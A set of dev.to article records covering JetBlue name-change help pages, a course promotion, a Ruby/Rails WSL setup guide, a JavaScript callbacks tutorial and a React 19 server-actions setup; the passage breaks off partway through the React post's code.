Dataset schema (column, type, and value or length range):

| Column | Type | Range |
| --- | --- | --- |
| id | int64 | 5 to 1.93M |
| title | string | lengths 0 to 128 |
| description | string | lengths 0 to 25.5k |
| collection_id | int64 | 0 to 28.1k |
| published_timestamp | timestamp[s] | |
| canonical_url | string | lengths 14 to 581 |
| tag_list | string | lengths 0 to 120 |
| body_markdown | string | lengths 0 to 716k |
| user_username | string | lengths 2 to 30 |
1,912,240
How do I change my name by phone with JetBlue?
Changing or correcting your name is mandatory for JetBlue flight reservations. The airline...
0
2024-07-05T04:33:58
https://dev.to/flightsyo/como-cambiar-mi-nombre-por-telefono-con-jetblue-3fjf
airtravravel, tickets, cheap, flight
Changing or correcting your name is mandatory for JetBlue flight reservations. The airline will only let you board with the correct name. You must correct or change your name so that it matches your passport, ID, and other government-approved documents. You can change your name in several ways, but the most effective is to do it by phone. The airline operates a dedicated helpline number in several regions to assist you. **How do you change your name using the JetBlue Spanish-language phone line?** You can make changes by phone using the **[JetBlue en español telefono](https://www.flightyo.com/es/espanol/jetblue-en-espanol-telefono/)** number. Call the dedicated helpline number and connect with an available agent. The team will assist you and help you correct or change your name. To do so, you will need to share the booking confirmation code and your last name. This information will help the airline retrieve your reservation and make the necessary changes to your name. You may need to share supporting documents, such as a birth certificate, legal documents, or a passport, as proof. **Are flight changes or cancellations available through JetBlue customer service?** Yes. You can change your flight or cancel an upcoming trip with the help of the JetBlue customer service team. To manage call volumes, the airline operates numerous dedicated helpline numbers. You can also use the **[JetBlue Teléfono Puerto Rico](https://www.flightyo.com/es/articulos/jetblue-telefono-puerto-rico/)** number to resolve concerns related to changes or cancellations. To do so, you will need to share your booking details with the customer service team and ask for help resolving the issue as soon as possible. If you have any questions about a travel issue, simply contact the team and sort it out. **Conclusion** You can make changes to your name, dates, and other aspects of your itinerary by connecting with the JetBlue customer service team. Reach out to them and make all the necessary arrangements at your convenience. If you have any doubts or questions, contact the customer service team; they will help you resolve your concerns and make all the necessary adjustments.
flightsyo
1,912,239
How do I change my name by phone with JetBlue?
Changing or correcting your name is mandatory for JetBlue flight reservations. The airline...
0
2024-07-05T04:33:55
https://dev.to/flightsyo/como-cambiar-mi-nombre-por-telefono-con-jetblue-3pdg
airtravravel, tickets, cheap, flight
Changing or correcting your name is mandatory for JetBlue flight reservations. The airline will only let you board with the correct name. You must correct or change your name so that it matches your passport, ID, and other government-approved documents. You can change your name in several ways, but the most effective is to do it by phone. The airline operates a dedicated helpline number in several regions to assist you. **How do you change your name using the JetBlue Spanish-language phone line?** You can make changes by phone using the **[JetBlue en español telefono](https://www.flightyo.com/es/espanol/jetblue-en-espanol-telefono/)** number. Call the dedicated helpline number and connect with an available agent. The team will assist you and help you correct or change your name. To do so, you will need to share the booking confirmation code and your last name. This information will help the airline retrieve your reservation and make the necessary changes to your name. You may need to share supporting documents, such as a birth certificate, legal documents, or a passport, as proof. **Are flight changes or cancellations available through JetBlue customer service?** Yes. You can change your flight or cancel an upcoming trip with the help of the JetBlue customer service team. To manage call volumes, the airline operates numerous dedicated helpline numbers. You can also use the **[JetBlue Teléfono Puerto Rico](https://www.flightyo.com/es/articulos/jetblue-telefono-puerto-rico/)** number to resolve concerns related to changes or cancellations. To do so, you will need to share your booking details with the customer service team and ask for help resolving the issue as soon as possible. If you have any questions about a travel issue, simply contact the team and sort it out. **Conclusion** You can make changes to your name, dates, and other aspects of your itinerary by connecting with the JetBlue customer service team. Reach out to them and make all the necessary arrangements at your convenience. If you have any doubts or questions, contact the customer service team; they will help you resolve your concerns and make all the necessary adjustments.
flightsyo
1,912,238
Unlock the Power of Digital Image Processing with UC Berkeley's EE225B Course 🚀
Comprehensive digital image processing course at UC Berkeley, covering fundamental concepts, hands-on experience, and valuable skills for computer vision, image analysis, and multimedia applications.
27,844
2024-07-05T04:31:58
https://getvm.io/tutorials/ee225b-digital-image-processing-spring-2014-uc-berkeley
getvm, programming, freetutorial, universitycourses
As a passionate learner, I'm thrilled to share with you an incredible resource that has the potential to transform your understanding of digital image processing. Introducing the EE225B course offered at the prestigious University of California, Berkeley! ![MindMap](https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/authcode/?code=NTc0YTBlOTQ0ZGZlNGYzNDMwZGQ3YmZiYzg3OTUyZTlfMTBmMWYxNGViZDM5ZmUwNTQxMDk1N2M4YmE0NGRmZjdfSUQ6NzM4ODAwNDc0OTA3NTU2MjUyNF8xNzIwMTUzOTE3OjE3MjAyNDAzMTdfVjM) ## Comprehensive Coverage of Digital Image Processing This course is a comprehensive deep dive into the world of digital image processing, covering a wide range of fundamental concepts and techniques. From image acquisition and enhancement to restoration, compression, and analysis, you'll gain a solid understanding of the principles that underpin this dynamic field. 💻 ## Hands-On Experience with Image Processing Algorithms and Tools But it's not just about the theory – the EE225B course also provides you with invaluable hands-on experience. You'll have the opportunity to work with cutting-edge image processing algorithms and tools, allowing you to put your newfound knowledge into practice. This practical approach will give you a competitive edge in the ever-evolving landscape of computer vision, image analysis, and multimedia applications. 🛠️ ## Taught by Experienced Faculty at a Top-Ranked Engineering School The course is led by experienced faculty members at UC Berkeley, a top-ranked engineering school renowned for its excellence in research and education. You'll have the chance to learn from the best, gaining insights and guidance from experts in the field. This is an opportunity to immerse yourself in a world-class learning environment and unlock your full potential. 🎓 ## Recommendation Whether you're a student aspiring to a career in computer vision, image analysis, or multimedia, or a professional looking to enhance your skillset, the EE225B course is a must-attend. It will provide you with a strong foundation in the principles and practice of digital image processing, equipping you with the knowledge and tools to tackle the challenges of the modern digital landscape. Don't miss out on this incredible opportunity – enroll in the EE225B course today and embark on a transformative journey into the world of digital image processing! 🌟 Course link: [https://inst.eecs.berkeley.edu/~ee225b/sp14/](https://inst.eecs.berkeley.edu/~ee225b/sp14/) ## Supercharge Your Learning with GetVM's Playground 🚀 While the EE225B course from UC Berkeley provides a comprehensive foundation in digital image processing, the real magic happens when you pair it with GetVM's powerful Playground. This Chrome browser extension offers an online coding environment that allows you to seamlessly apply the concepts you learn and experiment with hands-on projects. With GetVM's Playground, you can dive into the course materials and immediately put them into practice. No more switching between multiple windows or applications – everything you need is right at your fingertips. The intuitive interface and real-time feedback make it easy to test your understanding, debug your code, and explore the nuances of digital image processing. But the true advantage of using GetVM's Playground goes beyond just convenience. By integrating the course content with a robust coding environment, you'll be able to deepen your learning and solidify your skills. 
The ability to instantly apply what you've learned, tinker with algorithms, and see the results in real-time will accelerate your progress and help you become a true master of digital image processing. So, as you embark on your journey through the EE225B course, be sure to leverage the power of GetVM's Playground. It's the perfect companion to unlock your full potential and transform your understanding of this fascinating field. Start your learning adventure today by visiting the [EE225B Digital Image Processing Playground](https://getvm.io/tutorials/ee225b-digital-image-processing-spring-2014-uc-berkeley) and let the exploration begin! 🌟 --- ## Practice Now! - 🔗 Visit [Digital Image Processing | UC Berkeley EE225B Course](https://inst.eecs.berkeley.edu/~ee225b/sp14/) original website - 🚀 Practice [Digital Image Processing | UC Berkeley EE225B Course](https://getvm.io/tutorials/ee225b-digital-image-processing-spring-2014-uc-berkeley) on GetVM - 📖 Explore More [Free Resources on GetVM](https://getvm.io/explore) Join our [Discord](https://discord.gg/XxKAAFWVNu) or tweet us [@GetVM](https://x.com/getvmio) ! 😄
getvm
1,912,237
Looking to Contribute to Open Source Startups Using .NET and Angular
Hi everyone, I'm Jawad, a junior software engineer with a passion for .NET and Angular. With 3 years...
0
2024-07-05T04:23:31
https://dev.to/jawad_hayat/looking-to-contribute-to-open-source-startups-using-net-and-angular-hf8
dotnet, csharp, angular, opensource
Hi everyone, I'm Jawad, a junior software engineer with a passion for .NET and Angular. With 3 years of experience in machine learning, app support, and .NET development, I'm eager to contribute to open source startups. I'm looking for startups using .NET and Angular to contribute to and grow my skills. Any recommendations? Thanks!
jawad_hayat
1,912,145
Setup for Ruby / Rails: Windows + WSL
Setup for Ruby / Rails: Windows + WSL This article describes how to set up a development...
27,960
2024-07-05T03:22:40
https://dev.to/serradura/setup-para-ruby-rails-windows-wsl-479l
beginners, ruby, rails, braziliandevs
# Setup for Ruby / Rails: Windows + WSL This article describes how to set up a Ruby / Rails development environment on Windows 11 with WSL. It covers installing Visual Studio Code, asdf, Ruby, NodeJS, SQLite, Rails, and Ruby LSP (a plugin for VSCode). Before we start copying and pasting commands into the terminal, you will need to enable Hyper-V and install Windows Terminal and Visual Studio Code (all the steps are described below). If you have any questions or run into a problem, feel free to leave a comment and I will try to help you. 😊 If you already have WSL + Ubuntu installed and configured, you can skip to the section ["Setting the default editor on Ubuntu"](#configurando-o-editor-padrão-do-ubuntu). ## Enabling Hyper-V Hyper-V is a virtualization technology that lets you run virtual machines on Windows. It is required by WSL 2, the latest version of the Windows Subsystem for Linux. To enable it, follow the steps below: **1)** Type `appwiz.cpl` in the search field and press Enter. ![Searching for appwiz.cpl in the search field](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vjmzz551e217oynd82o4.png) **2)** Click "Turn Windows features on or off", check the "Hyper-V" box, and click OK. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v48h3fjhirkvu2o8bpxr.jpg) ## Installing Windows Terminal Windows Terminal is an application that lets you open several terminal tabs in a single window. It is very handy for switching between the Windows terminal and WSL. To install it, follow the steps below: **1)** Open the Microsoft Store. ![Microsoft Store](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3z2niw7op2ed16mbue27.jpg) **2)** Search for `Windows Terminal` and install the application. ![Searching for Windows Terminal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/444o6fku18e9lp9n3ljc.jpg) ## Installing WSL (Windows Subsystem for Linux 2) WSL is a feature that lets you run Linux applications on Windows. It is through WSL that we will install Ruby, Rails, and the other development tools. To install it, follow the steps below: **1)** Search for "Windows Terminal" in the Windows search field, right-click it, and select "Run as administrator". ![Opening the terminal as administrator](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hy2zr2oc2da4q4t1k0dj.png) **2)** Run: `wsl --install -d Ubuntu` ![Installing WSL + Ubuntu](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sgbo8re69q1fiygbl14q.png) **3)** After the installation, a message will appear asking you to set the Ubuntu username and password. Do so and write this information down, as it will be needed to access WSL. ![Setting the Ubuntu username and password](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/48n0j47b5cz05gik2ud7.jpg) **4)** When it finishes, you will be logged into Ubuntu automatically. ## Installing Visual Studio Code Visual Studio Code is a source-code editor developed by Microsoft. It is very popular among Ruby / Rails developers for being lightweight, fast, and having a large number of extensions. To install it, follow the steps below: **1)** In the Microsoft Store, search for "Visual Studio Code" and install the application. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0t1pyfgn61io4gnuphno.jpg) **2)** After the installation, open Visual Studio Code and install the WSL extension. 
![Installing the WSL extension in VSCode](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8fmb4jw37a61hyax6eef.jpg) ## Making Ubuntu the default in Windows Terminal **1)** Open Windows Terminal. Click the down arrow in the top-right corner (next to the tab) and select "Settings". **2)** Go to Startup > Default profile and change the value to "Ubuntu". ![Making Ubuntu the default terminal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hdxd9u8ttmu05lxh52pc.png) **3)** Close and reopen Windows Terminal to apply the changes. You will see that the default terminal is now Ubuntu. ![Ubuntu as the default terminal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wf9pehdmd066fosgv8hy.png) ## Setting the default editor on Ubuntu > From this point on, **all commands will be run in the Ubuntu terminal.** To make editing files easier, let's set Visual Studio Code as the terminal's default editor. To do so, just copy and paste the commands below into the terminal: ```sh # Update the package list with the latest versions sudo apt update # Set Visual Studio Code as the terminal's default editor echo 'export EDITOR="code --wait"' >> ~/.bashrc # Reload the terminal configuration file . ~/.bashrc ``` ## Installing asdf asdf is a manager for tools and their different versions. It lets you install, manage, and switch between multiple versions of Ruby, NodeJS, and other programs and programming languages. Run the commands below to install it. ```sh # Install Git and Curl sudo apt install -y curl git # Install asdf # -- https://asdf-vm.com/guide/getting-started.html#_2-download-asdf git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.14.0 # Configure asdf to load when the terminal starts echo '. "$HOME/.asdf/asdf.sh"' >> ~/.bashrc # Configure asdf autocompletion echo '. "$HOME/.asdf/completions/asdf.bash"' >> ~/.bashrc # Reload the terminal . ~/.bashrc ``` ## Installing Ruby Ruby is the programming language used by the Ruby on Rails framework. The commands below install the latest version of Ruby and set it as the system default. ```sh # Install the build dependencies # -- https://github.com/rbenv/ruby-build/wiki#ubuntudebianmint sudo apt install -y autoconf patch build-essential rustc libssl-dev libyaml-dev libreadline6-dev zlib1g-dev libgmp-dev libncurses5-dev libffi-dev libgdbm6 libgdbm-dev libdb-dev uuid-dev # Add the plugin to asdf asdf plugin add ruby # Install the latest version asdf install ruby latest:3 ``` After the installation, run the commands below to set the default Ruby version and update RubyGems (Ruby's library manager). ```sh # Check which version was installed asdf list ruby # You should see something like: # 3.3.3 # Set that version as the system default asdf global ruby 3.3.3 # Update RubyGems gem update --system # Check the default version ruby -v ``` ## Installing NodeJS NodeJS is a platform for developing applications in JavaScript. Node (or nodejs) is used by Rails to compile assets (such as CSS and JavaScript). The commands below install the latest version and set it as the system default. 
```sh # Install the build dependencies # -- https://github.com/nodejs/node/blob/main/BUILDING.md#building-nodejs-on-supported-platforms sudo apt install -y python3 g++ make python3-pip # Add the plugin to asdf asdf plugin add nodejs # Install the latest version asdf install nodejs latest # Check which version was installed asdf list nodejs # You should see something like: # 22.3.0 # Set that version as the system default asdf global nodejs 22.3.0 # Install yarn npm install -g yarn # Check the default version node -v ``` ## Installing SQLite SQLite is an embedded SQL database. In other words, it is a database that does not require a separate server, since everything is stored in a single file. ```sh sudo apt install -y sqlite3 ``` ## Installing Ruby LSP in Visual Studio Code Ruby LSP is a VSCode plugin that provides features such as autocompletion and formatting, among others, for both Ruby and Rails. ```sh # Install the Ruby LSP gem gem install ruby-lsp # Install the Ruby LSP extension in Visual Studio Code code --install-extension shopify.ruby-lsp ``` ## Installing Rails ```sh gem install rails # Check which version was installed rails -v ``` ## Creating a Rails project To test the Ruby and Rails installation, let's create a project and check that everything works. ```sh # Go to the home directory cd ~ # Create a folder to organize your projects mkdir Workspace # Enter the folder cd Workspace # Create a new Rails project # The default database is SQLite rails new myapp # Enter the project folder cd myapp # Create the database bin/rails db:create # Start the server bin/rails s ``` Open another terminal tab and run this command to open the application in the browser: ```sh explorer.exe http://localhost:3000 ``` ### Creating a contact manager ```sh # Create a scaffold for the Person entity bin/rails g scaffold Person first_name last_name email birthdate:date # Run the migrations to create the table in the database bin/rails db:migrate # Start the server (if it is not already running) # bin/rails s # Open the contact manager in the browser explorer.exe http://localhost:3000/people ``` Browse the system and try out listing, creating, viewing, editing, and deleting contacts. ### Improving the application's appearance To improve the system's look, let's add the class-less build of Pico CSS, which, as the name suggests, does not rely on CSS classes. In other words, plain HTML tags are enough to get a clean, consistent style. ```sh # Inside the project folder cd ~/Workspace/myapp # Open VSCode code . ``` In VSCode, open the file `app/views/layouts/application.html.erb` (use `Ctrl` + `p` to find the file) and add the following snippet inside the `<head>` tag: ```html <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@picocss/pico@2/css/pico.classless.min.css" /> ``` In the same file, wrap the contents of the `<body>` tag in a `<main>` tag: ```html <body> <main><%= yield %></main> </body> ``` After these changes, go back to the browser and reload to see the new look across every page of the system. ### Adding validations to the Person model Although functional, the contact manager has no validations. Let's add a few to ensure the data entered is valid. 
In VSCode, open the file `app/models/person.rb` (use `Ctrl` + `p` to find the file) and add the validations: ```ruby validates :first_name, :last_name, presence: true validates :email, format: /@/, allow_blank: true ``` Go back to the browser and try to create or edit a person without a first or last name, or with an e-mail that has no `@`. (A sketch of the complete model file with these validations in place appears right after the references below.) ## Conclusion See how simple it was to set up a Ruby / Rails development environment on Windows 11 + WSL? If you liked it, check the references below for more information about each of the programs and languages used. Do you struggle with English? Read this other post to learn [how to translate technical content in a practical way with Google Translator](https://serradura.github.io/pt-BR/blog/traduzindo_conteudo_tecnico_com_google_translator/). Did you enjoy the content? Have another tip? Then leave a comment below. Thanks! 😉 > **Note**: This article was written based on Ubuntu 22.04. If you are using another version, the commands may not work correctly. If you run into any problem, leave a comment and I will try to help you. 😊 ## References: The list below contains the reference sites used to create this document, in order of appearance in the post. - [Visual Studio Code](https://code.visualstudio.com/) - [Asdf](https://asdf-vm.com/guide/getting-started.html) - [Ruby](https://www.ruby-lang.org/en/) ([Releases](https://www.ruby-lang.org/en/downloads/releases/)) - [NodeJS](https://nodejs.org/en/) ([Releases](https://nodejs.org/en/download/releases/)) - [SQLite](https://www.sqlite.org/index.html) - [Ruby LSP](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp) - [Ruby on Rails](https://rubyonrails.org/) ([Getting Started](https://guides.rubyonrails.org/getting_started.html)) - [Pico CSS](https://picocss.com/) --- Have you heard of **ada.rb - Arquitetura e Design de Aplicações em Ruby**? It is a group focused on software engineering practices with Ruby. Join the <a href="https://t.me/ruby_arch_design_br" target="_blank">Telegram channel</a> and take part in our 100% online <a href="https://meetup.com/pt-BR/arquitetura-e-design-de-aplicacoes-ruby/" target="_blank">meetups</a>. ---
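For reference, here is a minimal sketch of how the full `app/models/person.rb` might look once the validations above are in place. It assumes the default `ApplicationRecord` base class that `rails g scaffold` generates; it is an illustration, not code from the original post.

```ruby
# app/models/person.rb (sketch of the scaffolded model after adding the validations)
class Person < ApplicationRecord
  # First and last name are required
  validates :first_name, :last_name, presence: true

  # The e-mail only needs to contain an "@" and may be left blank
  validates :email, format: /@/, allow_blank: true
end
```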
serradura
1,912,236
A Simple Guide to Callback Functions in JavaScript
In the ever-evolving landscape of web development, creating applications that deliver real-time...
0
2024-07-05T04:22:56
https://dev.to/srijan_karki/unlocking-the-power-of-asynchronous-javascript-callback-functions-promises-and-asyncawait-5fgj
webdev, javascript, beginners, programming
In the ever-evolving landscape of web development, creating applications that deliver real-time data—such as weather apps or live sports dashboards—demands a robust approach to handling asynchronous operations. JavaScript's prowess in managing these operations through callback functions, Promises, and async/await is indispensable. This article delves into these essential concepts, providing a thorough understanding of their mechanics and significance in modern JavaScript development. ![image] (https://www.elegantthemes.com/blog/wp-content/uploads/2018/09/request-callback.png) ## Table of Contents 1. [Understanding Callback Functions](#understanding-callback-functions) 2. [The Necessity of Callback Functions](#the-necessity-of-callback-functions) 3. [Constructing a Basic Callback Function](#constructing-a-basic-callback-function) 4. [Mechanics of Callbacks](#mechanics-of-callbacks) 5. [Error Handling with Callbacks](#error-handling-with-callbacks) 6. [Navigating Callback Hell](#navigating-callback-hell) 7. [Harnessing Promises for Better Control](#harnessing-promises-for-better-control) 8. [Streamlining with Async/Await](#streamlining-with-asyncawait) 9. [Wrapping Up](#wrapping-up) ## Understanding Callback Functions Imagine you're hosting a party and you order a pizza. You tell the pizza place to call you back when it's ready. While you wait, you continue to enjoy the party, mingling with guests and having fun. When the pizza is finally ready, the pizza place calls you back to let you know. In JavaScript, a callback function works similarly. You pass a function (the callback) to another function to be executed later, allowing your code to continue running without waiting for that function to finish its task. When the task is complete, the callback function is called, just like the pizza place calling you back when your pizza is ready. ![Pizza GIF](https://media2.giphy.com/media/lp8Kl4PZ8kY8pRr6Q2/giphy.gif?cid=6c09b952ibf2fjifxhu29mrm16zepv9y4mi9i0owut96al7p&ep=v1_gifs_search&rid=giphy.gif&ct=g) A callback function is a function passed as an argument to another function, which is executed after the completion of a specified task. This capability allows JavaScript to handle tasks such as file reading, HTTP requests, or user input processing without blocking the program's execution, thereby ensuring a seamless user experience. ## The Necessity of Callback Functions JavaScript operates in a single-threaded environment, processing one command at a time. Callback functions are vital for managing asynchronous operations, allowing the program to continue running smoothly without waiting for tasks to complete. This approach is crucial for maintaining a responsive and efficient application, especially in web development. ## Constructing a Basic Callback Function Consider the following example to understand the basic structure of a callback function: ```javascript function fetchDataFromAPI(apiUrl, callback) { console.log(`Fetching data from ${apiUrl}...`); // Simulate an asynchronous operation setTimeout(() => { const data = { temperature: 25, condition: "Sunny" }; callback(data); }, 1000); } function displayWeather(data) { console.log(`The weather is ${data.condition} with a temperature of ${data.temperature}°C.`); } fetchDataFromAPI("https://api.weather.com", displayWeather); ``` In this example: - The `fetchDataFromAPI` function takes an `apiUrl` and a `callback` function as arguments. - After simulating data fetching, it calls the callback function with the fetched data. 
## Mechanics of Callbacks 1. **Passing the Function**: The desired function is passed as an argument to another function. 2. **Executing the Callback**: The main function executes the callback function at the appropriate time, such as after a delay, upon task completion, or when an event occurs. Here’s a more detailed example with a simulated asynchronous operation using `setTimeout`: ```javascript function processOrder(orderId, callback) { console.log(`Processing order #${orderId}...`); // Simulate an asynchronous operation setTimeout(() => { const status = "Order completed"; callback(status); }, 1500); } function updateOrderStatus(status) { console.log(`Order status: ${status}`); } processOrder(12345, updateOrderStatus); ``` In this scenario: - `processOrder` simulates order processing after a 1.5-second delay. - The callback function updates the order status once the processing is done. ## Error Handling with Callbacks Handling errors is a critical aspect of real-world applications. A common pattern involves passing an error as the first argument to the callback function: ```javascript function readFileContent(filePath, callback) { const fs = require('fs'); fs.readFile(filePath, 'utf8', (err, data) => { if (err) { callback(err, null); } else { callback(null, data); } }); } readFileContent('sample.txt', (err, data) => { if (err) { console.error("Error reading file:", err); } else { console.log("File content:", data); } }); ``` In this code: - The `readFileContent` function reads a file asynchronously. - It calls the callback with an error (if any) or the file data. ## Navigating Callback Hell As applications scale, managing multiple nested callbacks can become complex and hard to maintain, a situation often referred to as "callback hell": ```javascript function stepOne(callback) { setTimeout(() => callback(null, 'Step One Completed'), 1000); } function stepTwo(callback) { setTimeout(() => callback(null, 'Step Two Completed'), 1000); } function stepThree(callback) { setTimeout(() => callback(null, 'Step Three Completed'), 1000); } stepOne((err, result) => { if (err) return console.error(err); console.log(result); stepTwo((err, result) => { if (err) return console.error(err); console.log(result); stepThree((err, result) => { if (err) return console.error(err); console.log(result); }); }); }); ``` This code is difficult to read and maintain. Modern JavaScript addresses this issue with Promises and async/await syntax, offering cleaner and more manageable code. ## Harnessing Promises for Better Control Promises represent the eventual completion (or failure) of an asynchronous operation and its resulting value: ```javascript function fetchUserData() { return new Promise((resolve, reject) => { setTimeout(() => { const success = true; if (success) { resolve({ id: 1, username: "john_doe" }); } else { reject("Failed to fetch user data"); } }, 1000); }); } fetchUserData() .then(data => { console.log("User data received:", data); }) .catch(error => { console.error("Error:", error); }); ``` ## Streamlining with Async/Await Async/await syntax simplifies working with Promises: ```javascript async function getUserData() { try { const data = await fetchUserData(); console.log("User data received:", data); } catch (error) { console.error("Error:", error); } } getUserData(); ``` This approach makes asynchronous code resemble synchronous code, enhancing readability and maintainability. ## Wrapping Up Callback functions are foundational in JavaScript for handling asynchronous operations. 
While they provide a powerful way to manage asynchronous flow, they can become unwieldy. Utilizing Promises and async/await syntax can streamline your code, making it cleaner and easier to manage. Mastering these concepts will empower you to write more efficient and maintainable JavaScript code, a crucial skill in the realm of modern web development. By understanding and leveraging callback functions, Promises, and async/await, you can ensure your applications are responsive, efficient, and capable of handling real-time data effectively.
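Revisiting the `stepOne`/`stepTwo`/`stepThree` example from the "Navigating Callback Hell" section, here is a hedged sketch (not from the original article) of how those same node-style steps could be wrapped in Promises and run with async/await. `promisify` is an illustrative helper written for this sketch, and the three step functions are assumed to be the ones defined earlier.

```javascript
// Wrap a node-style step (error-first callback) in a Promise (illustrative helper).
function promisify(step) {
  return () =>
    new Promise((resolve, reject) => {
      step((err, result) => (err ? reject(err) : resolve(result)));
    });
}

// The same three steps from the callback-hell example, now flat and sequential.
async function runSteps() {
  try {
    console.log(await promisify(stepOne)());
    console.log(await promisify(stepTwo)());
    console.log(await promisify(stepThree)());
  } catch (err) {
    console.error(err);
  }
}

runSteps();
```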
srijan_karki
1,912,235
React 19 setup and use of server actions
TLDR: Github repo npm init -y Create a folder and run npm init -y in it. ...
0
2024-07-05T04:22:45
https://dev.to/roggc/use-react-19-with-server-components-without-a-framework-cl8
react
TLDR: [Github repo](https://github.com/roggc/react-19) ## `npm init -y` Create a folder and run `npm init -y` in it. ## Install dependencies Install the dependencies with the following command: ```bash npm i webpack webpack-cli react@rc react-dom@rc react-server-dom-webpack@rc babel-loader @babel/core @babel/register @babel/preset-react @babel/plugin-transform-modules-commonjs express ``` ## Configure Babel Add this to your `package.json`: ```json "babel": { "presets": [ [ "@babel/preset-react", { "runtime": "automatic" } ] ] } ``` ## Add scripts to `package.json` Add the following scripts to your `package.json`: ```json "dev": "webpack -w", "start": "node --conditions react-server server/server.js" ``` ## This is how your `package.json` must look ```json { "name": "react-19-essay", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "dev": "webpack -w", "start": "node --conditions react-server server/server.js" }, "author": "", "license": "ISC", "dependencies": { "@babel/core": "^7.24.7", "@babel/plugin-transform-modules-commonjs": "^7.24.7", "@babel/preset-react": "^7.24.7", "@babel/register": "^7.24.6", "babel-loader": "^9.1.3", "express": "^4.19.2", "react": "^19.0.0-rc-f38c22b244-20240704", "react-dom": "^19.0.0-rc-f38c22b244-20240704", "react-server-dom-webpack": "^19.0.0-rc-f38c22b244-20240704", "webpack": "^5.92.1", "webpack-cli": "^5.1.4" }, "babel": { "presets": [ [ "@babel/preset-react", { "runtime": "automatic" } ] ] } } ``` ## Create the `webpack.config.js` file At the root of the project, create a `webpack.config.js` file with the following content: ```javascript const path = require("path"); const ReactServerWebpackPlugin = require("react-server-dom-webpack/plugin"); module.exports = { mode: "development", entry: [path.resolve(__dirname, "./src/index.js")], output: { path: path.resolve(__dirname, "./public"), filename: "main.js", }, module: { rules: [ { test: /\.js$/, use: "babel-loader", exclude: /node_modules/, }, ], }, plugins: [new ReactServerWebpackPlugin({ isServer: false })], }; ``` From the look to this configuration file, we know we need a `src/index.js` file. ## Create a `src/index.js` file Create a `src` folder and put in it the following file (`index.js`): ```javascript import { use } from "react"; import { createFromFetch } from "react-server-dom-webpack/client"; import { createRoot } from "react-dom/client"; const root = createRoot(document.getElementById("root")); root.render(<Root />); const cache = new Map(); function Root() { let content = cache.get("home"); if (!content) { content = createFromFetch(fetch("/react")); cache.set("home", content); } return <>{use(content)}</>; } ``` You see how we use `createFromFetch` from `react-server-dom-webpack/client`. You also see how we fetch to `/react` endpoint. 
## Create a `server/server.js` file Create a `server` folder and put in it the following file (`server.js`): ```javascript const register = require("react-server-dom-webpack/node-register"); register(); const path = require("path"); const { readFileSync } = require("fs"); const babelRegister = require("@babel/register"); babelRegister({ ignore: [/[\\\/](build|server|node_modules)[\\\/]/], presets: [["@babel/preset-react", { runtime: "automatic" }]], plugins: ["@babel/transform-modules-commonjs"], }); const { renderToPipeableStream } = require("react-server-dom-webpack/server"); const express = require("express"); const React = require("react"); const ReactApp = require("../src/app").default; const app = express(); app.get("/", (req, res) => { const html = readFileSync( path.resolve(__dirname, "../public/index.html"), "utf8" ); res.send(html); }); app.get("/react", (req, res) => { const manifest = readFileSync( path.resolve(__dirname, "../public/react-client-manifest.json"), "utf8" ); const moduleMap = JSON.parse(manifest); const { pipe } = renderToPipeableStream( React.createElement(ReactApp), moduleMap ); pipe(res); }); app.use(express.static(path.resolve(__dirname, "../public"))); const port = process.env.PORT || 3000; app.listen(port, () => console.log(`listening on port ${port}`)); ``` You see how we use `renderToPipeableStream` from `react-server-dom-webpack/server`. You also see how we require a `src/app.js` file. You also see how we use the `public` folder for static files. ## Create a `public/index.html` file Create a `public` file and put in it the following file (`index.html`): ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="description" content="React with Server Components" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>fun!</title> <script defer src="main.js"></script> </head> <body> <div id="root"></div> </body> </html> ``` ## The `src` folder Until here the setup. Now we will focus on creating code for our app. First we need to create the `app.js` file, the entry point of our app (a React component). 
```javascript "use client"; import Comp1 from "./non-bloking-server-actions-components/comp1/callable"; export default function () { return <Comp1 name="Albert" />; } ``` `Comp1` is in this case a client component that calls a non-blocking server action: ```javascript "use client"; import action from "./action"; export default function (props) { return action(props); } ``` `action` is the non-blocking server action: ```javascript "use server"; import Output from "./output"; export default function ({ name }) { const messagePromise = new Promise((res) => setTimeout(() => res("hello x " + name), 2000) ); return <Output greetingPromise={messagePromise} />; } ``` `Output` is a React Client Component: ```javascript "use client"; import Counter from "../../pure-client-components/counter"; import Wrapper from "../../wrapper"; export default function ({ greetingPromise }) { return ( <> <div> <Wrapper>{greetingPromise}</Wrapper> </div> <Counter /> </> ); } ``` `Wrapper` is this React Client Component: ```javascript "use client"; import { Suspense } from "react"; import ErrorBoundary from "./error-boundary"; export default function Wrapper({ children }) { return ( <ErrorBoundary fallback={<div>Something crashed.</div>}> <Suspense fallback={<div>Loading...</div>}>{children}</Suspense> </ErrorBoundary> ); } ``` and `Counter` is a regular React Client Component: ```javascript "use client"; import { useState } from "react"; export default function Counter() { const [count, setCount] = useState(0); const increment = () => { setCount(count + 1); }; return <button onClick={increment}>{count}</button>; } ``` ## Conclusion You see how with the use of non-blocking server actions that return client components, server components are not necessary. What we see in this example is a counter available and interactive from the first moment, and a loading indicator for a greeting message. ## References The original setup for a working implementation of React Server Components without a framework was taken from [here](https://www.reddit.com/r/react/comments/16jq5z4/tutorial_how_to_use_react_server_components_rsc/).
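One file the walkthrough above imports but never shows is `error-boundary.js` (used by `Wrapper`). Here is a minimal sketch of what such a component could look like, using React's standard class-based error boundary API; this is an assumption about the file's contents, not the repository's actual code.

```javascript
"use client";
import { Component } from "react";

// Minimal error boundary: render the fallback prop when any child throws.
export default class ErrorBoundary extends Component {
  constructor(props) {
    super(props);
    this.state = { hasError: false };
  }

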